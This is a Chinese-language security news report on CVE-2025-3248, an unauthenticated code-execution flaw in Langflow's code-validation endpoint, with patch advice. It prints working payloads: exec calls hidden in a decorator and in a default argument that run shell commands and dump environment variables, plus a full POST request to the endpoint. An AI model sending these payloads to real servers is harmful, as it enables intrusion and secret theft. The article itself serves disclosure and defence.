江蘇
關鍵詞
安全漏洞
網(wǎng)絡安全研究人員在 Langflow 中發(fā)現(xiàn)了一個嚴重的遠程代碼執(zhí)行(RCE)漏洞。Langflow 是一個被廣泛用于以可視化方式構建由人工智能驅動的智能體和工作流程的開源平臺。
這個高嚴重性漏洞被編號為 CVE-2025-3248,其通用漏洞評分系統(tǒng)(CVSS)評分為 9.8,屬于嚴重級別。
該安全漏洞影響 1.3.0 版本之前的所有 Langflow 版本,攻擊者無需身份驗證即可在存在漏洞的服務器上執(zhí)行任意命令,這有可能危及敏感數(shù)據(jù)和系統(tǒng)安全。
該漏洞專門針對 Langflow 的 /api/v1/validate/code 端點,該端點在用戶提供的代碼上不當調(diào)用了 Python 的內(nèi)置函數(shù) exec ()。
這一實現(xiàn)缺乏適當?shù)纳矸蒡炞C檢查和沙盒保護機制,為惡意行為者提供了一個危險的攻擊面。
在其人工智能開發(fā)工作流程中使用 Langflow 的企業(yè)面臨著重大風險,因為攻擊者可以利用這一漏洞獲得對系統(tǒng)的未經(jīng)授權訪問,并以應用服務器的權限執(zhí)行命令。
Zscaler 的研究人員發(fā)現(xiàn),該漏洞源于 Python 在處理函數(shù)定義時的特性,即在函數(shù)定義處理過程中,裝飾器和默認參數(shù)值會被立即求值。
這一特性使得嵌入在這些結構中的惡意代碼能夠在抽象語法樹(AST)處理階段執(zhí)行。
研究人員強調(diào),這一漏洞表明在處理動態(tài)代碼執(zhí)行時,實施適當?shù)纳矸蒡炞C和沙盒措施至關重要。
攻擊者可以利用這個漏洞針對可公開訪問的 Langflow 實例,或者通過各種攻擊途徑入侵內(nèi)部部署的系統(tǒng)。
一旦獲得訪問權限,攻擊者就可以利用這個存在漏洞的端點建立持久訪問權限、竊取數(shù)據(jù),或者在受影響的網(wǎng)絡中進行橫向移動。
鑒于該漏洞易于被利用且容易被訪問,安全專家敦促立即修復這一漏洞。
對技術實現(xiàn)的研究表明,Langflow 的代碼驗證機制試圖在評估特定組件(包括函數(shù)定義)之前,將用戶提交的代碼解析為抽象語法樹(AST)。
這個過程涉及導入指定的模塊并執(zhí)行函數(shù)定義以驗證其結構,但關鍵的是未能限制執(zhí)行上下文。
利用機制
攻擊方以創(chuàng)造性的方式利用了 Python 的函數(shù)定義特性來實現(xiàn)代碼執(zhí)行。
當 Langflow 通過其驗證端點處理代碼時,攻擊者可以使用兩種主要方法注入惡意負載。
第一種方法是將命令嵌入函數(shù)裝飾器中,這些裝飾器在代碼處理過程中會立即執(zhí)行。例如:
@exec("import os; os.system('id > /tmp/pwned')")
def foo():
pass第二種方法是利用函數(shù)定義中的默認參數(shù)值,這些默認參數(shù)值在抽象語法樹(AST)處理階段也會被求值:
def foo(cmd=exec("__import__('subprocess').check_output(['env'])")):
pass當攻擊者通過 POST 請求將這些惡意負載發(fā)送到存在漏洞的端點時,攻擊就會發(fā)生:
POST /api/v1/validate/code HTTP/1.1
Host: vuln-test-langflow.example.com
Content-Type: application/json
Content-Length: 172
{
"code": "@exec(\"with open('hacked.txt', 'w') as f: f.write('The server has been compromised')\")\ndef foo():\n pass"
}完整的攻擊鏈條展示了攻擊者如何從針對存在漏洞的端點,逐步實現(xiàn)對服務器的代碼執(zhí)行。
雖然服務器的響應看似正常,但惡意代碼會在后臺悄然執(zhí)行,有可能創(chuàng)建后門或竊取數(shù)據(jù)。
強烈建議使用 Langflow 的企業(yè)立即升級到 1.3.0 或更高版本,該版本對存在漏洞的端點要求進行身份驗證。
此外,實施網(wǎng)絡分段、通過零信任架構限制訪問,以及部署監(jiān)控解決方案,有助于在進行升級的同時降低風險。
安全圈
網(wǎng)羅圈內(nèi)熱點 專注網(wǎng)絡安全
實時資訊一手掌握!
好看你就分享 有用就點個贊
支持「安全圈」就點個三連吧!
特別聲明:以上內(nèi)容(如有圖片或視頻亦包括在內(nèi))為自媒體平臺“網(wǎng)易號”用戶上傳并發(fā)布,本平臺僅提供信息存儲服務。
Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.
